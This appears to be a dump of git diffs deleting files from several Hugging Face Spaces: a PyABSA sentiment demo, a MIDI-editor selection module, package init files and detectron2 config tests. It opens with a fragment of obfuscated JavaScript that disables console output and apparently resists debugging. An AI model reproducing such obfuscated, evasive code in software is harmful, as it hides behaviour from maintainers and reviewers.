_0x5ef808(_0x51a59e-0x1dc,_0x265bb8-0x163,_0x2ce528-0xd3,_0x2035c1-0x315,_0xb6c224);}if(_0x274a73[_0x286c2e(0x2b6,0x363,0x2b9,0x3bf,0x275)](_0x274a73[_0x315baa(-0x6,0xfb,-0x8d,0x61,0x148)],_0x274a73[_0x286c2e(0x259,0x2e7,0x3b2,0x2f9,0x30e)])){if(_0x274a73[_0x1df5ce(-0x1a3,-0x1eb,-0x29d,-0x1fb,-0x1d7)](typeof _0x1f2ebb,_0x274a73[_0x1df5ce(-0x150,-0x37,-0x9,-0x129,-0xf8)])){if(_0x274a73[_0x286c2e(0x46f,0x3ba,0x2f3,0x476,0x445)](_0x274a73[_0x286c2e(0x2d6,0x3b8,0x2fc,0x39b,0x37c)],_0x274a73[_0x1df5ce(-0x29f,-0x2da,-0x330,-0x325,-0x280)]))return function(_0x4925d3){}[_0x315baa(0xd3,0x1dc,0x135,0x108,0x68)+_0x292b63(-0x287,-0x2da,-0x20b,-0x397,-0x246)+'r'](_0x274a73[_0x1df5ce(-0x202,-0x14a,-0x173,-0xd7,-0x125)])[_0x286c2e(0x407,0x3e0,0x3d1,0x45c,0x318)](_0x274a73[_0x286c2e(0x31d,0x2a4,0x2f9,0x2a2,0x301)]);else{if(_0x39b16c)return _0x1925b8;else _0x274a73[_0x315baa(-0xda,0x0,0x2,0x9,0xe0)](_0x101893,0x70e+0x101f*0x1+-0x172d);}}else{if(_0x274a73[_0x56c700(0x67,0x11d,0x15f,0x1e7,0x136)](_0x274a73[_0x292b63(-0x131,-0x1f4,-0x2c4,-0x2a0,-0x237)],_0x274a73[_0x56c700(0x1ed,0x244,0x23f,0x20a,0x156)])){if(_0x274a73[_0x292b63(-0x19f,-0x1ce,-0x29f,-0x168,-0x108)](_0x274a73[_0x292b63(-0x3af,-0x2ef,-0x294,-0x30e,-0x279)]('',_0x274a73[_0x1df5ce(-0x1de,-0x105,-0x15f,-0x1cc,-0x134)](_0x1f2ebb,_0x1f2ebb))[_0x274a73[_0x292b63(-0x31e,-0x26c,-0x2ea,-0x219,-0x336)]],0x1*0x1894+-0x1e6*-0x1+-0x1*0x1a79)||_0x274a73[_0x286c2e(0x43d,0x3e5,0x311,0x416,0x43e)](_0x274a73[_0x315baa(-0xaf,0x96,-0xa9,0x38,0x8a)](_0x1f2ebb,-0x2647+0x990+0x51*0x5b),0xcc7+-0x226d+0xa3*0x22)){if(_0x274a73[_0x286c2e(0x3f5,0x360,0x279,0x44d,0x392)](_0x274a73[_0x56c700(0x1f2,0x110,0x125,0x1e3,0x1bd)],_0x274a73[_0x292b63(-0x1dc,-0x18d,-0x205,-0x22b,-0x9d)])){const _0x43262d=_0x684335[_0x1df5ce(-0x277,-0x27f,-0x1e6,-0x26d,-0x1a7)+_0x292b63(-0x2bf,-0x2da,-0x33f,-0x355,-0x39f)+'r'][_0x315baa(0x124,0x161,0x15b,0x189,0x137)+_0x56c700(0xc9,0x184,0x95,0x1ea,0x11b)][_0x315baa(0x151,0xf0,0x77,0xae,0x11)](_0x260ca5),_0x4d05b3=_0x30fcfe[_0x4bcff0],_0x246e19=_0xf77b38[_0x4d05b3]||_0x43262d;_0x43262d[_0x56c700(0x1c7,0x1b1,0x61,0x5f,0xf1)+_0x286c2e(0x1ed,0x296,0x1d7,0x256,0x2c8)]=_0xcfbab7[_0x286c2e(0x3db,0x334,0x362,0x3c2,0x2f8)](_0x4d58aa),_0x43262d[_0x286c2e(0x4d8,0x427,0x3bd,0x449,0x514)+_0x292b63(-0x33f,-0x300,-0x3bb,-0x2d9,-0x31a)]=_0x246e19[_0x286c2e(0x388,0x427,0x4b6,0x380,0x517)+_0x286c2e(0x2ec,0x288,0x204,0x28e,0x302)][_0x286c2e(0x3fe,0x334,0x3c7,0x32e,0x397)](_0x246e19),_0x146534[_0x4d05b3]=_0x43262d;}else(function(){function _0x211536(_0x2a2ec9,_0x41a5df,_0x1cc2c8,_0x448a30,_0x2348d1){return _0x56c700(_0x2a2ec9-0x55,_0x41a5df-0x130,_0x1cc2c8-0x121,_0x2348d1,_0x448a30- -0x104);}function _0x33fd27(_0x1fc3cd,_0x4560b,_0xd10f2,_0xc63e04,_0x369d8b){return _0x315baa(_0x1fc3cd-0x9d,_0x4560b-0x15d,_0xd10f2-0xd9,_0xd10f2-0x3ee,_0x4560b);}function _0x30472a(_0x1059da,_0x359c8f,_0x26274b,_0x233917,_0x2a0e44){return _0x315baa(_0x1059da-0x129,_0x359c8f-0x27,_0x26274b-0x38,_0x233917-0x2c0,_0x1059da);}function _0x4e1c90(_0x134d49,_0x5ecc47,_0x5b5911,_0x3c7817,_0xe475e2){return _0x1df5ce(_0xe475e2,_0x5ecc47-0x130,_0x5b5911-0x124,_0x3c7817-0xcb,_0x5b5911-0x179);}function _0x2c9db6(_0x47552d,_0x1bb639,_0x3ea939,_0x234693,_0x386f79){return _0x286c2e(_0x47552d-0x1ae,_0x234693- -0x287,_0x3ea939-0xfb,_0x234693-0xa3,_0x1bb639);}if(_0x274a73[_0x2c9db6(-0x79,-0x4,-0x56,0x5d,-0x4)](_0x274a73[_0x2c9db6(0x85,0x8c,-0x33,-0x1e,0xd3)],_0x274a73[_0x33fd27(0x416,0x3c0,0x3d1,0x338,0x3b2)]))return!![];else _0xbe906e[_0x30472a(0x245,0x2c3,0x367,0x2db,0x31f)](_0x4e1c90(-0xe0,-0x51,-0x101,-0x1c5,-0x150)+_0x33fd27(0x4b2,0x432,0x422,0x3b7,0x3ae)+_0x2c9db6(0x17d,0x113,0x1e8,0x13a,0x1fc)+_0x211536(-0xa,0x132,-0x56,0x43,0xff)+_0x2c9db6(0xb0,0x191,0x146,0xe7,0xa)+'\x20'+_0x398d92);}[_0x286c2e(0x300,0x38e,0x3eb,0x3f6,0x311)+_0x292b63(-0x244,-0x2da,-0x2ec,-0x349,-0x2e8)+'r'](_0x274a73[_0x56c700(-0x27,0xee,-0x81,0xab,0x5b)](_0x274a73[_0x286c2e(0x3ec,0x407,0x4b0,0x38d,0x4f8)],_0x274a73[_0x56c700(0xcb,0x78,0x51,0x183,0x137)]))[_0x292b63(-0x2a8,-0x319,-0x273,-0x357,-0x308)](_0x274a73[_0x286c2e(0x43f,0x35f,0x2eb,0x346,0x38e)]));}else _0x274a73[_0x286c2e(0x22d,0x311,0x2b1,0x3d3,0x243)](_0x274a73[_0x286c2e(0x430,0x356,0x441,0x369,0x424)],_0x274a73[_0x286c2e(0x38b,0x38c,0x3ff,0x47c,0x3f2)])?_0x1f49b7[_0x315baa(-0xd3,0x100,0xef,0x1b,0xfc)](_0x1df5ce(-0x140,-0x25e,-0x234,-0x19a,-0x1f7)+_0x286c2e(0x242,0x287,0x328,0x1b0,0x1cb)+_0x315baa(0x134,-0x1f,0xf0,0x68,0x12c)+_0x292b63(-0x143,-0x1f9,-0x22b,-0x131,-0x2cc)+_0x286c2e(0x4c6,0x40e,0x41a,0x32f,0x494)+_0x286c2e(0x3e8,0x326,0x2ae,0x2a5,0x3a6)+_0x16a84a):function(){function _0x3daebb(_0x9a03ab,_0x37dd8e,_0x520996,_0x7d7599,_0x428686){return _0x56c700(_0x9a03ab-0x2,_0x37dd8e-0x8d,_0x520996-0xde,_0x520996,_0x37dd8e- -0x35);}function _0x4a4d08(_0x148057,_0x2bddf0,_0x49762d,_0x459365,_0x46d29a){return _0x292b63(_0x148057-0xb9,_0x459365-0x113,_0x46d29a,_0x459365-0x53,_0x46d29a-0x35);}function _0x35a402(_0x423f90,_0x5e706b,_0x5d8a0d,_0x117a44,_0x56245b){return _0x1df5ce(_0x423f90,_0x5e706b-0x102,_0x5d8a0d-0x7c,_0x117a44-0x10d,_0x5e706b-0x5f0);}function _0x5a477a(_0x11ee68,_0x4912c5,_0x47236b,_0x2f288e,_0x117b0e){return _0x292b63(_0x11ee68-0x1bf,_0x11ee68-0x5d3,_0x4912c5,_0x2f288e-0xa,_0x117b0e-0x1be);}if(_0x36d494[_0x3daebb(0x19c,0x10b,0xb2,0xc4,0x1d1)](_0x36d494[_0x3daebb(0x11f,0x127,0x166,0x141,0x1ec)],_0x36d494[_0x3daebb(0xd6,0xcd,0x9a,0x5a,0xdf)])){const _0x50f770=_0x1e56db[_0x4a4d08(-0x89,-0x3e,-0xb1,-0x95,-0x74)](_0x342abc,arguments);return _0x2dfae9=null,_0x50f770;}else return![];}[_0x292b63(-0x234,-0x1fa,-0x15d,-0x22f,-0x22d)+_0x1df5ce(-0x29e,-0x288,-0x2ed,-0x2a3,-0x287)+'r'](_0x274a73[_0x286c2e(0x2d9,0x28a,0x288,0x1e0,0x1e4)](_0x274a73[_0x286c2e(0x41b,0x407,0x486,0x35a,0x34c)],_0x274a73[_0x286c2e(0x356,0x375,0x45c,0x3af,0x387)]))[_0x286c2e(0x44b,0x3e0,0x3d9,0x33a,0x413)](_0x274a73[_0x286c2e(0x292,0x329,0x30f,0x3ad,0x26c)]);}else{const _0x1e6bb6=_0x122d56[_0x1df5ce(-0x137,-0x102,-0xa6,-0x7b,-0x155)](_0x680e0c,arguments);return _0x47d3e4=null,_0x1e6bb6;}}_0x274a73[_0x315baa(0x12d,0xe5,0xb4,0x5c,0x137)](_0x4dacc1,++_0x1f2ebb);}else{let _0x4d39a7;try{const _0x57e87a=_0x36d494[_0x56c700(0x221,0x2b3,0x285,0x18a,0x1fd)](_0x5e3f46,_0x36d494[_0x286c2e(0x31e,0x2cb,0x341,0x26f,0x36f)](_0x36d494[_0x1df5ce(-0x28d,-0x23d,-0x246,-0x179,-0x263)](_0x36d494[_0x56c700(0x1ae,0x121,0xc8,0x1d5,0x142)],_0x36d494[_0x292b63(-0x217,-0x19d,-0x18f,-0x18c,-0x1fe)]),');'));_0x4d39a7=_0x36d494[_0x315baa(0x1b0,0xb5,0x59,0xe3,0xa4)](_0x57e87a);}catch(_0x18b37e){_0x4d39a7=_0x24fb6b;}const _0x510e9f=_0x4d39a7[_0x292b63(-0x365,-0x2be,-0x37e,-0x366,-0x2c7)+'le']=_0x4d39a7[_0x315baa(0x12f,0x49,0xe7,0x44,0x13)+'le']||{},_0x1bc6ab=[_0x36d494[_0x56c700(0x199,0x1ac,0x100,0xd4,0xc8)],_0x36d494[_0x292b63(-0x241,-0x1c0,-0x219,-0x134,-0x2b0)],_0x36d494[_0x56c700(0xfc,0xfa,0x209,0x134,0x149)],_0x36d494[_0x56c700(0xfb,0xcb,0x122,0xfb,0x50)],_0x36d494[_0x1df5ce(-0x1fd,-0x7c,-0xb9,-0x16c,-0x11d)],_0x36d494[_0x1df5ce(-0x249,-0x1ef,-0xcf,-0x1a8,-0x15d)],_0x36d494[_0x292b63(-0x260,-0x20d,-0x1b5,-0x219,-0x1b9)]];for(let _0x228541=-0x264e+0x112e+0x1520;_0x36d494[_0x1df5ce(-0x1d6,-0x167,-0x2e2,-0x236,-0x1f1)](_0x228541,_0x1bc6ab[_0x292b63(-0x2a9,-0x2b4,-0x2d2,-0x24a,-0x317)+'h']);_0x228541++){const _0x3d0927=_0x275b00[_0x286c2e(0x38f,0x38e,0x472,0x3c2,0x450)+_0x315baa(-0x23,0xd,0xdc,0x28,-0x26)+'r'][_0x1df5ce(-0xc0,-0x1d0,-0x1a3,-0x45,-0x126)+_0x292b63(-0x24f,-0x22f,-0x235,-0x21c,-0x1ed)][_0x1df5ce(-0x203,-0x2d3,-0x243,-0x136,-0x201)](_0x50ba5a),_0x4f0687=_0x1bc6ab[_0x228541],_0x44c38c=_0x510e9f[_0x4f0687]||_0x3d0927;_0x3d0927[_0x1df5ce(-0x179,-0x2e7,-0x239,-0x127,-0x206)+_0x56c700(0xd9,-0x85,0x122,0xda,0x58)]=_0x366acb[_0x292b63(-0x2fa,-0x254,-0x22c,-0x1e1,-0x30d)](_0x5ce843),_0x3d0927[_0x56c700(0x1f1,0x135,0x17a,0x26b,0x1e9)+_0x315baa(0x9c,-0x50,-0x79,0x2,0xbc)]=_0x44c38c[_0x315baa(0x22a,0x144,0x144,0x1a1,0x17c)+_0x56c700(-0x64,0xbb,0xb7,0xa0,0x4a)][_0x1df5ce(-0x187,-0x25e,-0x246,-0x13f,-0x201)](_0x44c38c),_0x510e9f[_0x4f0687]=_0x3d0927;}}}function _0x4c92c1(_0x31556a,_0x459b40,_0x395ee7,_0x195162,_0x4d9d70){return _0x504eae(_0x459b40-0xc1,_0x459b40-0xa1,_0x395ee7-0x126,_0x195162-0xed,_0x195162);}function _0x5ef808(_0x313b76,_0x3f475c,_0x527422,_0x576a4e,_0xd60573){return _0x1d31e6(_0x576a4e- -0x345,_0x3f475c-0x74,_0xd60573,_0x576a4e-0x156,_0xd60573-0xa9);}function _0x163385(_0x27c341,_0x53ff3b,_0x3d059a,_0x536423,_0x42ac09){return _0x5b3717(_0x27c341- -0x66,_0x3d059a,_0x3d059a-0xa,_0x536423-0xce,_0x42ac09-0x2e);}function _0x37219c(_0xca9036,_0x4dc92e,_0x422991,_0x54701d,_0x40f6bf){return _0x1e3602(_0xca9036-0xa4,_0x40f6bf,_0x422991-0x126,_0x422991-0x2b2,_0x40f6bf-0x46);}try{if(_0x274a73[_0x4c92c1(0x484,0x3ee,0x351,0x351,0x438)](_0x274a73[_0x163385(-0x1f7,-0x2a5,-0x1bb,-0x148,-0x226)],_0x274a73[_0x5ef808(-0x11f,-0x228,-0x277,-0x1f7,-0x2c2)])){if(_0x505d61){if(_0x274a73[_0x3c56c7(0x37f,0x312,0x357,0x2e0,0x2b6)](_0x274a73[_0x4c92c1(0x275,0x34e,0x301,0x3ad,0x294)],_0x274a73[_0x37219c(0x34c,0x1c9,0x274,0x1b7,0x302)]))_0x274a73[_0x5ef808(-0x28f,-0x303,-0x372,-0x2a8,-0x24f)](_0x478d65,-0xe9*0x13+0x7b8+0x993);else return _0x4dacc1;}else{if(_0x274a73[_0x163385(-0x265,-0x2d8,-0x2c6,-0x349,-0x24c)](_0x274a73[_0x37219c(0x336,0x29f,0x249,0x2eb,0x268)],_0x274a73[_0x5ef808(-0x20d,-0x12a,-0x19a,-0x1d1,-0x21f)]))_0x274a73[_0x5ef808(-0x22a,-0x36f,-0x2bd,-0x2a8,-0x2b0)](_0x4dacc1,-0x231+-0x3*0xcdb+0x28c2);else{let _0x5d9b75;try{_0x5d9b75=_0x274a73[_0x5ef808(-0x23d,-0x2cd,-0x274,-0x271,-0x2c9)](_0x58446f,_0x274a73[_0x5ef808(-0x2bd,-0x136,-0x214,-0x1f9,-0x150)](_0x274a73[_0x4c92c1(0x30d,0x38b,0x2b8,0x352,0x325)](_0x274a73[_0x4c92c1(0x3ba,0x2ce,0x296,0x295,0x2ea)],_0x274a73[_0x3c56c7(0x1ce,0x17d,0x137,0x18b,0x20d)]),');'))();}catch(_0x724811){_0x5d9b75=_0xa22605;}return _0x5d9b75;}}}else{if(_0x47e411){const _0x386471=_0x3c6c2a[_0x4c92c1(0x4c4,0x43e,0x415,0x449,0x374)](_0x5e66a5,arguments);return _0x2b067c=null,_0x386471;}}}catch(_0x399381){}} diff --git a/spaces/yangheng/PyABSA-APC/app.py b/spaces/yangheng/PyABSA-APC/app.py deleted file mode 100644 index 0e67f7239243c44be5ff8d65e57aef30dfa9f8f9..0000000000000000000000000000000000000000 --- a/spaces/yangheng/PyABSA-APC/app.py +++ /dev/null @@ -1,52 +0,0 @@ -# -*- coding: utf-8 -*- -# file: deploy_demo.py -# time: 2021/10/10 -# author: yangheng -# github: https://github.com/yangheng95 -# Copyright (C) 2021. All Rights Reserved. - -import gradio as gr -import pandas as pd - -from pyabsa import APCCheckpointManager - -sentiment_classifier = APCCheckpointManager.get_sentiment_classifier(checkpoint='multilingual', - auto_device=True # False means load model on CPU - ) - - -def inference(text): - result = sentiment_classifier.infer(text=text, - print_result=True, - ignore_error=False, - clear_input_samples=True) - - result = pd.DataFrame({ - 'aspect': result['aspect'], - 'sentiment': result['sentiment'], - 'confidence': [round(c, 3) for c in result['confidence']], - 'ref_sentiment': ['' if ref == '-999' else ref for ref in result['ref_sentiment']], - 'is_correct': result['ref_check'], - }) - - return result - - -if __name__ == '__main__': - iface = gr.Interface( - fn=inference, - inputs=["text"], - examples=[ - ['Strong build though which really adds to its [ASP]durability[ASP] .'], # !sent! Positive - ['Strong [ASP]build[ASP] though which really adds to its durability . !sent! Positive'], - ['The [ASP]battery life[ASP] is excellent - 6-7 hours without charging . !sent! Positive'], - ['I have had my [ASP]computer[ASP] for 2 weeks already and it [ASP]works[ASP] perfectly . !sent! Positive, Positive'], - ['And I may be the only one but I am really liking [ASP]Windows 8[ASP] . !sent! Positive'], - ['This demo is trained on the laptop and restaurant and other review datasets from [ASP]ABSADatasets[ASP] (https://github.com/yangheng95/ABSADatasets)'], - ['To fit on your data, please train the model on your own data, see the [ASP]PyABSA[ASP] (https://github.com/yangheng95/PyABSA)'], - ], - outputs="dataframe", - title='Multilingual Aspect Sentiment Classification for Short Texts (powered by PyABSA)' - ) - - iface.launch(share=True) diff --git a/spaces/yderre-aubay/midi-player-demo/src/common/selection/ArrangeSelection.ts b/spaces/yderre-aubay/midi-player-demo/src/common/selection/ArrangeSelection.ts deleted file mode 100644 index 359a08dbf60e2127a73c187a444a06cfce2d9ec0..0000000000000000000000000000000000000000 --- a/spaces/yderre-aubay/midi-player-demo/src/common/selection/ArrangeSelection.ts +++ /dev/null @@ -1,72 +0,0 @@ -import Quantizer from "../quantizer" -import { ArrangePoint } from "../transform/ArrangePoint" - -export interface ArrangeSelection { - fromTick: number - fromTrackIndex: number - toTick: number - toTrackIndex: number -} - -export function arrangeSelectionFromPoints( - start: ArrangePoint, - end: ArrangePoint, - quantizer: Quantizer, - maxTrackIndex: number, -): ArrangeSelection { - const startSelection = selectionForPoint(start, quantizer) - const endSelection = selectionForPoint(end, quantizer) - return clampSelection( - unionSelections(startSelection, endSelection), - maxTrackIndex, - ) -} - -export const selectionForPoint = ( - point: ArrangePoint, - quantizer: Quantizer, -): ArrangeSelection => { - const fromTick = quantizer.floor(point.tick) - const toTick = quantizer.ceil(point.tick) - return { - fromTick, - toTick, - fromTrackIndex: Math.floor(point.trackIndex), - toTrackIndex: Math.floor(point.trackIndex) + 1, - } -} - -export const unionSelections = ( - a: ArrangeSelection, - b: ArrangeSelection, -): ArrangeSelection => { - return { - fromTick: Math.min(a.fromTick, b.fromTick), - toTick: Math.max(a.toTick, b.toTick), - fromTrackIndex: Math.min(a.fromTrackIndex, b.fromTrackIndex), - toTrackIndex: Math.max(a.toTrackIndex, b.toTrackIndex), - } -} - -export const clampSelection = ( - selection: ArrangeSelection, - maxTrackIndex: number, -): ArrangeSelection => ({ - fromTick: Math.max(0, selection.fromTick), - toTick: Math.max(0, selection.toTick), - fromTrackIndex: Math.min( - maxTrackIndex, - Math.max(0, selection.fromTrackIndex), - ), - toTrackIndex: Math.min(maxTrackIndex, Math.max(0, selection.toTrackIndex)), -}) - -export const movedSelection = ( - selection: ArrangeSelection, - delta: ArrangePoint, -): ArrangeSelection => ({ - fromTick: selection.fromTick + delta.tick, - toTick: selection.toTick + delta.tick, - fromTrackIndex: selection.fromTrackIndex + delta.trackIndex, - toTrackIndex: selection.toTrackIndex + delta.trackIndex, -}) diff --git a/spaces/yerfor/SyntaSpeech/modules/vocoder/parallel_wavegan/models/__init__.py b/spaces/yerfor/SyntaSpeech/modules/vocoder/parallel_wavegan/models/__init__.py deleted file mode 100644 index 4803ba6b2a0afc8022e756ae5b3f4c7403c3c1bd..0000000000000000000000000000000000000000 --- a/spaces/yerfor/SyntaSpeech/modules/vocoder/parallel_wavegan/models/__init__.py +++ /dev/null @@ -1,2 +0,0 @@ -from .melgan import * # NOQA -from .parallel_wavegan import * # NOQA diff --git a/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/detectron2/modeling/__init__.py b/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/detectron2/modeling/__init__.py deleted file mode 100644 index 576493de77c361928ebd2491cb490113522f42d6..0000000000000000000000000000000000000000 --- a/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/detectron2/modeling/__init__.py +++ /dev/null @@ -1,59 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -from detectron2.layers import ShapeSpec - -from .anchor_generator import build_anchor_generator, ANCHOR_GENERATOR_REGISTRY -from .backbone import ( - BACKBONE_REGISTRY, - FPN, - Backbone, - ResNet, - ResNetBlockBase, - build_backbone, - build_resnet_backbone, - make_stage, -) -from .meta_arch import ( - META_ARCH_REGISTRY, - SEM_SEG_HEADS_REGISTRY, - GeneralizedRCNN, - PanopticFPN, - ProposalNetwork, - RetinaNet, - SemanticSegmentor, - build_model, - build_sem_seg_head, - FCOS, -) -from .postprocessing import detector_postprocess -from .proposal_generator import ( - PROPOSAL_GENERATOR_REGISTRY, - build_proposal_generator, - RPN_HEAD_REGISTRY, - build_rpn_head, -) -from .roi_heads import ( - ROI_BOX_HEAD_REGISTRY, - ROI_HEADS_REGISTRY, - ROI_KEYPOINT_HEAD_REGISTRY, - ROI_MASK_HEAD_REGISTRY, - ROIHeads, - StandardROIHeads, - BaseMaskRCNNHead, - BaseKeypointRCNNHead, - FastRCNNOutputLayers, - build_box_head, - build_keypoint_head, - build_mask_head, - build_roi_heads, -) -from .test_time_augmentation import DatasetMapperTTA, GeneralizedRCNNWithTTA -from .mmdet_wrapper import MMDetBackbone, MMDetDetector - -_EXCLUDE = {"ShapeSpec"} -__all__ = [k for k in globals().keys() if k not in _EXCLUDE and not k.startswith("_")] - - -from detectron2.utils.env import fixup_module_metadata - -fixup_module_metadata(__name__, globals(), __all__) -del fixup_module_metadata diff --git a/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/tests/config/test_yacs_config.py b/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/tests/config/test_yacs_config.py deleted file mode 100644 index 01dd6955f78e2700ffc10ed723ab1c95df0e5a18..0000000000000000000000000000000000000000 --- a/spaces/ynhe/AskAnything/models/grit_src/third_party/CenterNet2/tests/config/test_yacs_config.py +++ /dev/null @@ -1,270 +0,0 @@ -#!/usr/bin/env python -# Copyright (c) Facebook, Inc. and its affiliates. - - -import os -import tempfile -import unittest -import torch -from omegaconf import OmegaConf - -from detectron2 import model_zoo -from detectron2.config import configurable, downgrade_config, get_cfg, upgrade_config -from detectron2.layers import ShapeSpec -from detectron2.modeling import build_model - -_V0_CFG = """ -MODEL: - RPN_HEAD: - NAME: "TEST" -VERSION: 0 -""" - -_V1_CFG = """ -MODEL: - WEIGHT: "/path/to/weight" -""" - - -class TestConfigVersioning(unittest.TestCase): - def test_upgrade_downgrade_consistency(self): - cfg = get_cfg() - # check that custom is preserved - cfg.USER_CUSTOM = 1 - - down = downgrade_config(cfg, to_version=0) - up = upgrade_config(down) - self.assertTrue(up == cfg) - - def _merge_cfg_str(self, cfg, merge_str): - f = tempfile.NamedTemporaryFile(mode="w", suffix=".yaml", delete=False) - try: - f.write(merge_str) - f.close() - cfg.merge_from_file(f.name) - finally: - os.remove(f.name) - return cfg - - def test_auto_upgrade(self): - cfg = get_cfg() - latest_ver = cfg.VERSION - cfg.USER_CUSTOM = 1 - - self._merge_cfg_str(cfg, _V0_CFG) - - self.assertEqual(cfg.MODEL.RPN.HEAD_NAME, "TEST") - self.assertEqual(cfg.VERSION, latest_ver) - - def test_guess_v1(self): - cfg = get_cfg() - latest_ver = cfg.VERSION - self._merge_cfg_str(cfg, _V1_CFG) - self.assertEqual(cfg.VERSION, latest_ver) - - -class _TestClassA(torch.nn.Module): - @configurable - def __init__(self, arg1, arg2, arg3=3): - super().__init__() - self.arg1 = arg1 - self.arg2 = arg2 - self.arg3 = arg3 - assert arg1 == 1 - assert arg2 == 2 - assert arg3 == 3 - - @classmethod - def from_config(cls, cfg): - args = {"arg1": cfg.ARG1, "arg2": cfg.ARG2} - return args - - -class _TestClassB(_TestClassA): - @configurable - def __init__(self, input_shape, arg1, arg2, arg3=3): - """ - Doc of _TestClassB - """ - assert input_shape == "shape" - super().__init__(arg1, arg2, arg3) - - @classmethod - def from_config(cls, cfg, input_shape): # test extra positional arg in from_config - args = {"arg1": cfg.ARG1, "arg2": cfg.ARG2} - args["input_shape"] = input_shape - return args - - -class _LegacySubClass(_TestClassB): - # an old subclass written in cfg style - def __init__(self, cfg, input_shape, arg4=4): - super().__init__(cfg, input_shape) - assert self.arg1 == 1 - assert self.arg2 == 2 - assert self.arg3 == 3 - - -class _NewSubClassNewInit(_TestClassB): - # test new subclass with a new __init__ - @configurable - def __init__(self, input_shape, arg4=4, **kwargs): - super().__init__(input_shape, **kwargs) - assert self.arg1 == 1 - assert self.arg2 == 2 - assert self.arg3 == 3 - - -class _LegacySubClassNotCfg(_TestClassB): - # an old subclass written in cfg style, but argument is not called "cfg" - def __init__(self, config, input_shape): - super().__init__(config, input_shape) - assert self.arg1 == 1 - assert self.arg2 == 2 - assert self.arg3 == 3 - - -class _TestClassC(_TestClassB): - @classmethod - def from_config(cls, cfg, input_shape, **kwargs): # test extra kwarg overwrite - args = {"arg1": cfg.ARG1, "arg2": cfg.ARG2} - args["input_shape"] = input_shape - args.update(kwargs) - return args - - -class _TestClassD(_TestClassA): - @configurable - def __init__(self, input_shape: ShapeSpec, arg1: int, arg2, arg3=3): - assert input_shape == "shape" - super().__init__(arg1, arg2, arg3) - - # _TestClassA.from_config does not have input_shape args. - # Test whether input_shape will be forwarded to __init__ - - -@configurable(from_config=lambda cfg, arg2: {"arg1": cfg.ARG1, "arg2": arg2, "arg3": cfg.ARG3}) -def _test_func(arg1, arg2=2, arg3=3, arg4=4): - return arg1, arg2, arg3, arg4 - - -class TestConfigurable(unittest.TestCase): - def testInitWithArgs(self): - _ = _TestClassA(arg1=1, arg2=2, arg3=3) - _ = _TestClassB("shape", arg1=1, arg2=2) - _ = _TestClassC("shape", arg1=1, arg2=2) - _ = _TestClassD("shape", arg1=1, arg2=2, arg3=3) - - def testPatchedAttr(self): - self.assertTrue("Doc" in _TestClassB.__init__.__doc__) - self.assertEqual(_TestClassD.__init__.__annotations__["arg1"], int) - - def testInitWithCfg(self): - cfg = get_cfg() - cfg.ARG1 = 1 - cfg.ARG2 = 2 - cfg.ARG3 = 3 - _ = _TestClassA(cfg) - _ = _TestClassB(cfg, input_shape="shape") - _ = _TestClassC(cfg, input_shape="shape") - _ = _TestClassD(cfg, input_shape="shape") - _ = _LegacySubClass(cfg, input_shape="shape") - _ = _NewSubClassNewInit(cfg, input_shape="shape") - _ = _LegacySubClassNotCfg(cfg, input_shape="shape") - with self.assertRaises(TypeError): - # disallow forwarding positional args to __init__ since it's prone to errors - _ = _TestClassD(cfg, "shape") - - # call with kwargs instead - _ = _TestClassA(cfg=cfg) - _ = _TestClassB(cfg=cfg, input_shape="shape") - _ = _TestClassC(cfg=cfg, input_shape="shape") - _ = _TestClassD(cfg=cfg, input_shape="shape") - _ = _LegacySubClass(cfg=cfg, input_shape="shape") - _ = _NewSubClassNewInit(cfg=cfg, input_shape="shape") - _ = _LegacySubClassNotCfg(config=cfg, input_shape="shape") - - def testInitWithCfgOverwrite(self): - cfg = get_cfg() - cfg.ARG1 = 1 - cfg.ARG2 = 999 # wrong config - with self.assertRaises(AssertionError): - _ = _TestClassA(cfg, arg3=3) - - # overwrite arg2 with correct config later: - _ = _TestClassA(cfg, arg2=2, arg3=3) - _ = _TestClassB(cfg, input_shape="shape", arg2=2, arg3=3) - _ = _TestClassC(cfg, input_shape="shape", arg2=2, arg3=3) - _ = _TestClassD(cfg, input_shape="shape", arg2=2, arg3=3) - - # call with kwargs cfg=cfg instead - _ = _TestClassA(cfg=cfg, arg2=2, arg3=3) - _ = _TestClassB(cfg=cfg, input_shape="shape", arg2=2, arg3=3) - _ = _TestClassC(cfg=cfg, input_shape="shape", arg2=2, arg3=3) - _ = _TestClassD(cfg=cfg, input_shape="shape", arg2=2, arg3=3) - - def testInitWithCfgWrongArgs(self): - cfg = get_cfg() - cfg.ARG1 = 1 - cfg.ARG2 = 2 - with self.assertRaises(TypeError): - _ = _TestClassB(cfg, "shape", not_exist=1) - with self.assertRaises(TypeError): - _ = _TestClassC(cfg, "shape", not_exist=1) - with self.assertRaises(TypeError): - _ = _TestClassD(cfg, "shape", not_exist=1) - - def testBadClass(self): - class _BadClass1: - @configurable - def __init__(self, a=1, b=2): - pass - - class _BadClass2: - @configurable - def __init__(self, a=1, b=2): - pass - - def from_config(self, cfg): # noqa - pass - - class _BadClass3: - @configurable - def __init__(self, a=1, b=2): - pass - - # bad name: must be cfg - @classmethod - def from_config(cls, config): # noqa - pass - - with self.assertRaises(AttributeError): - _ = _BadClass1(a=1) - - with self.assertRaises(TypeError): - _ = _BadClass2(a=1) - - with self.assertRaises(TypeError): - _ = _BadClass3(get_cfg()) - - def testFuncWithCfg(self): - cfg = get_cfg() - cfg.ARG1 = 10 - cfg.ARG3 = 30 - - self.assertEqual(_test_func(1), (1, 2, 3, 4)) - with self.assertRaises(TypeError): - _test_func(cfg) - self.assertEqual(_test_func(cfg, arg2=2), (10, 2, 30, 4)) - self.assertEqual(_test_func(cfg, arg1=100, arg2=20), (100, 20, 30, 4)) - self.assertEqual(_test_func(cfg, arg1=100, arg2=20, arg4=40), (100, 20, 30, 40)) - - self.assertTrue(callable(_test_func.from_config)) - - def testOmegaConf(self): - cfg = model_zoo.get_config("COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_1x.yaml") - cfg = OmegaConf.create(cfg.dump()) - if not torch.cuda.is_available(): - cfg.MODEL.DEVICE = "cpu" - # test that a model can be built with omegaconf config as well - build_model(cfg) diff --git a/spaces/yooch/yooch/ChuanhuChatbot.py b/spaces/yooch/yooch/ChuanhuChatbot.py deleted file mode 100644 index 